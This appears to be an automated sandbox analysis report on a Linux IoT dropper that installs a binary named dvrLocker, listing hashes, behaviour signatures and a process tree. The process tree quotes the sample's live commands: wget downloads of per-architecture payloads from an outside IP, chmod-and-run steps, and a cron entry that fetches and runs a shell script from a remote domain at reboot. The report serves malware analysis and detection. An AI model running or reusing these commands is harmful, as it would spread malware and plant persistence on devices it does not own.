Analysis
-
max time kernel
149s -
max time network
137s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
27/11/2024, 02:39
Static task
static1
Behavioral task
behavioral1
Sample
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Resource
debian9-mipsel-20240226-en
General
-
Target
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
-
Size
913B
-
MD5
c18ef2271ad912c7542293151373ffa0
-
SHA1
65fb65c17671657fc431173051fe794c6c63007d
-
SHA256
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b
-
SHA512
fb9a3ec37ee5f8f71b343285f034a6c27520fdc6525b217b411023b4c9741282cd36354442853caa50a2d2fe54dfb6e8f8453f36cdd773573435062f82bcdfc9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 22 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 844 chmod 862 chmod 815 chmod 829 chmod 887 chmod 919 chmod 923 chmod 871 chmod 883 chmod 891 chmod 832 sh 854 chmod 858 chmod 866 chmod 875 chmod 879 chmod 895 chmod 899 chmod 903 chmod 907 chmod 911 chmod 915 chmod -
Executes dropped EXE 7 IoCs
ioc pid Process /tmp/lib/dvrLocker 816 dvrLocker /tmp/lib/dvrLocker 830 dvrLocker /tmp/lib/dvrLocker 848 dvrLocker /tmp/lib/dvrLocker 855 dvrLocker /tmp/lib/dvrLocker 859 dvrLocker /tmp/lib/dvrLocker 863 dvrLocker /tmp/lib/dvrLocker 867 dvrLocker -
Renames itself 1 IoCs
pid Process 830 dvrLocker -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 81.169.136.222 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.hCusdS crontab -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself [watchdog/0] 830 dvrLocker -
description ioc Process File opened for reading /proc/911/status dvrLocker File opened for reading /proc/923/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/mounts dvrLocker File opened for reading /proc/856/status dvrLocker File opened for reading /proc/926/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/903/status dvrLocker File opened for reading /proc/910/status dvrLocker File opened for reading /proc/918/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/850/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/895/status dvrLocker File opened for reading /proc/920/status dvrLocker File opened for reading /proc/925/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/866/status dvrLocker File opened for reading /proc/847/cmdline dvrLocker File opened for reading /proc/868/status dvrLocker File opened for reading /proc/922/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/843/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/873/status dvrLocker File opened for reading /proc/842/status dvrLocker File opened for reading /proc/899/status dvrLocker File opened for reading /proc/880/status dvrLocker File opened for reading /proc/898/status dvrLocker File opened for reading /proc/919/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems mkdir File opened for reading /proc/906/status dvrLocker File opened for reading /proc/912/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/852/status dvrLocker File opened for reading /proc/885/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/846/status dvrLocker File opened for reading /proc/2/cmdline dvrLocker File opened for reading /proc/851/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems crontab File opened for reading /proc/841/status dvrLocker File opened for reading /proc/867/status dvrLocker File opened for reading /proc/924/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/849/status dvrLocker File opened for reading /proc/870/status dvrLocker File opened for reading /proc/882/status dvrLocker File opened for reading /proc/886/status dvrLocker File opened for reading /proc/893/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/704/cmdline dvrLocker -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 821 wget 840 rm 874 wget 877 rm 905 rm -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/lib/dvrLocker 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Processes
-
/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown1⤵
- Writes file to tmp directory
PID:704 -
/bin/lsls -l /proc/1/exe2⤵PID:706
-
-
/bin/lsls -l /proc/10/exe2⤵PID:712
-
-
/bin/lsls -l /proc/11/exe2⤵
- Reads runtime system information
PID:715
-
-
/bin/lsls -l /proc/110/exe2⤵
- Reads runtime system information
PID:719
-
-
/bin/lsls -l /proc/12/exe2⤵
- Reads runtime system information
PID:722
-
-
/bin/lsls -l /proc/126/exe2⤵PID:726
-
-
/bin/lsls -l /proc/127/exe2⤵PID:729
-
-
/bin/lsls -l /proc/13/exe2⤵PID:731
-
-
/bin/lsls -l /proc/14/exe2⤵PID:733
-
-
/bin/lsls -l /proc/15/exe2⤵PID:735
-
-
/bin/lsls -l /proc/152/exe2⤵PID:736
-
-
/bin/lsls -l /proc/159/exe2⤵PID:739
-
-
/bin/lsls -l /proc/16/exe2⤵
- Reads runtime system information
PID:741
-
-
/bin/lsls -l /proc/17/exe2⤵
- Reads runtime system information
PID:742
-
-
/bin/lsls -l /proc/176/exe2⤵
- Reads runtime system information
PID:744
-
-
/bin/lsls -l /proc/18/exe2⤵PID:745
-
-
/bin/lsls -l /proc/19/exe2⤵PID:746
-
-
/bin/lsls -l /proc/2/exe2⤵PID:748
-
-
/bin/lsls -l /proc/20/exe2⤵PID:749
-
-
/bin/lsls -l /proc/21/exe2⤵
- Reads runtime system information
PID:750
-
-
/bin/lsls -l /proc/22/exe2⤵PID:751
-
-
/bin/lsls -l /proc/23/exe2⤵PID:752
-
-
/bin/lsls -l /proc/24/exe2⤵PID:753
-
-
/bin/lsls -l /proc/243/exe2⤵PID:754
-
-
/bin/lsls -l /proc/3/exe2⤵
- Reads runtime system information
PID:755
-
-
/bin/lsls -l /proc/330/exe2⤵PID:756
-
-
/bin/lsls -l /proc/333/exe2⤵
- Reads runtime system information
PID:757
-
-
/bin/lsls -l /proc/334/exe2⤵PID:758
-
-
/bin/lsls -l /proc/336/exe2⤵PID:759
-
-
/bin/lsls -l /proc/337/exe2⤵
- Reads runtime system information
PID:760
-
-
/bin/lsls -l /proc/36/exe2⤵
- Reads runtime system information
PID:761
-
-
/bin/lsls -l /proc/37/exe2⤵
- Reads runtime system information
PID:762
-
-
/bin/lsls -l /proc/389/exe2⤵PID:763
-
-
/bin/lsls -l /proc/391/exe2⤵PID:764
-
-
/bin/lsls -l /proc/394/exe2⤵PID:765
-
-
/bin/lsls -l /proc/399/exe2⤵PID:766
-
-
/bin/lsls -l /proc/4/exe2⤵PID:767
-
-
/bin/lsls -l /proc/402/exe2⤵
- Reads runtime system information
PID:768
-
-
/bin/lsls -l /proc/5/exe2⤵
- Reads runtime system information
PID:769
-
-
/bin/lsls -l /proc/6/exe2⤵
- Reads runtime system information
PID:770
-
-
/bin/lsls -l /proc/661/exe2⤵PID:771
-
-
/bin/lsls -l /proc/674/exe2⤵PID:772
-
-
/bin/lsls -l /proc/677/exe2⤵PID:773
-
-
/bin/lsls -l /proc/679/exe2⤵PID:774
-
-
/bin/lsls -l /proc/680/exe2⤵PID:775
-
-
/bin/lsls -l /proc/696/exe2⤵
- Reads runtime system information
PID:776
-
-
/bin/lsls -l /proc/697/exe2⤵PID:777
-
-
/bin/lsls -l /proc/699/exe2⤵
- Reads runtime system information
PID:778
-
-
/bin/lsls -l /proc/7/exe2⤵
- Reads runtime system information
PID:779
-
-
/bin/lsls -l /proc/70/exe2⤵PID:780
-
-
/bin/lsls -l /proc/701/exe2⤵PID:781
-
-
/bin/lsls -l /proc/702/exe2⤵PID:782
-
-
/bin/lsls -l /proc/703/exe2⤵
- Reads runtime system information
PID:783
-
-
/bin/lsls -l /proc/704/exe2⤵
- Reads runtime system information
PID:784
-
-
/bin/lsls -l /proc/705/exe2⤵
- Reads runtime system information
PID:785
-
-
/bin/lsls -l /proc/71/exe2⤵PID:786
-
-
/bin/lsls -l /proc/72/exe2⤵PID:787
-
-
/bin/lsls -l /proc/73/exe2⤵PID:788
-
-
/bin/lsls -l /proc/74/exe2⤵PID:789
-
-
/bin/lsls -l /proc/75/exe2⤵PID:790
-
-
/bin/lsls -l /proc/76/exe2⤵PID:791
-
-
/bin/lsls -l /proc/77/exe2⤵PID:792
-
-
/bin/lsls -l /proc/78/exe2⤵PID:793
-
-
/bin/lsls -l /proc/79/exe2⤵PID:794
-
-
/bin/lsls -l /proc/8/exe2⤵
- Reads runtime system information
PID:796
-
-
/bin/lsls -l /proc/82/exe2⤵PID:798
-
-
/bin/lsls -l /proc/9/exe2⤵
- Reads runtime system information
PID:800
-
-
/bin/rmrm -rf /tmp/lib/2⤵PID:802
-
-
/bin/rmrm -rf /tmp/lib/dvrLocker2⤵PID:803
-
-
/bin/mkdirmkdir /tmp/lib/2⤵
- Reads runtime system information
PID:805
-
-
/usr/bin/wgetwget http://45.125.66.90/mpsl -O -2⤵PID:807
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm -rf mpsl2⤵PID:819
-
-
/usr/bin/wgetwget http://45.125.66.90/mips -O -2⤵
- System Network Configuration Discovery
PID:821
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
- Renames itself
- Changes its process name
- Reads runtime system information
PID:830 -
/bin/shsh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"3⤵
- File and Directory Permissions Modification
PID:832 -
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:834
-
-
/usr/bin/crontabcrontab -l4⤵PID:835
-
-
-
-
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:840
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm -rf arm2⤵PID:852
-
-
/usr/bin/wgetwget http://45.125.66.90/arm5 -O -2⤵PID:853
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm -rf arm52⤵PID:856
-
-
/usr/bin/wgetwget http://45.125.66.90/ppc -O -2⤵PID:857
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm -rf ppc2⤵PID:860
-
-
/usr/bin/wgetwget http://45.125.66.90/arm7 -O -2⤵PID:861
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm -rf arm72⤵PID:864
-
-
/usr/bin/wgetwget http://45.125.66.90/arm6 -O -2⤵PID:865
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm -rf arm62⤵PID:868
-
-
/bin/rmrm -rf /mnt/dvrLocker2⤵PID:869
-
-
/usr/bin/wgetwget http://45.125.66.90/mpsl -O -2⤵PID:870
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:871
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:872
-
-
/bin/rmrm -rf mpsl2⤵PID:873
-
-
/usr/bin/wgetwget http://45.125.66.90/mips -O -2⤵
- System Network Configuration Discovery
PID:874
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:875
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:876
-
-
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:877
-
-
/usr/bin/wgetwget http://45.125.66.90/arm -O -2⤵PID:878
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:879
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:880
-
-
/bin/rmrm -rf arm2⤵PID:881
-
-
/usr/bin/wgetwget http://45.125.66.90/arm5 -O -2⤵PID:882
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:883
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:884
-
-
/bin/rmrm -rf arm52⤵PID:885
-
-
/usr/bin/wgetwget http://45.125.66.90/ppc -O -2⤵PID:886
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:887
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:888
-
-
/bin/rmrm -rf ppc2⤵PID:889
-
-
/usr/bin/wgetwget http://45.125.66.90/arm7 -O -2⤵PID:890
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:891
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:892
-
-
/usr/bin/wgetwget http://45.125.66.90/arm6 -O -2⤵PID:894
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:895
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:896
-
-
/bin/rmrm -rf arm62⤵PID:897
-
-
/usr/bin/wgetwget http://45.125.66.90/mpsl -O -2⤵PID:898
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:899
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:900
-
-
/bin/rmrm -rf mpsl2⤵PID:901
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:903
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:904
-
-
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:905
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:907
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:908
-
-
/bin/rmrm -rf arm2⤵PID:909
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:911
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:912
-
-
/bin/rmrm -rf arm52⤵PID:913
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:915
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:916
-
-
/bin/rmrm -rf ppc2⤵PID:917
-
-
/usr/bin/wgetwget http://45.125.66.90/arm7 -O -2⤵PID:918
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:919
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:920
-
-
/bin/rmrm -rf arm72⤵PID:921
-
-
/usr/bin/wgetwget http://45.125.66.90/arm6 -O -2⤵PID:922
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:923
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:924
-
-
/bin/rmrm -rf arm62⤵PID:925
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
100KB
MD54ad582d49f505bfab7de84881998685b
SHA15f09f4baed114b594729ded91e2c4d263f0e2754
SHA256b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA5126f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4
-
Filesize
99KB
MD5559f129d380ad1cfb60792c6b2dc3d32
SHA13997a0fc0bd5958783f1751364ec407c5b170adc
SHA256fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d
SHA5129f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112
-
Filesize
306B
MD552e1ad18d178f2dcf0faeda00070f21e
SHA1c683c24e4fe9a0ed77cb7623e061d86179185397
SHA256d34450689b23cae53222c9fc6c976d4b7a72ede1c77caea45659a2cb3387f9a1
SHA512112c995b57dffa2713a0d5610d90b55b70d56703b66b970bf1f7d82b74c5518770882c3d43c23286cdc1fce7acb4b55c4d6b3e71f9513e8052437caeaf6c0ffa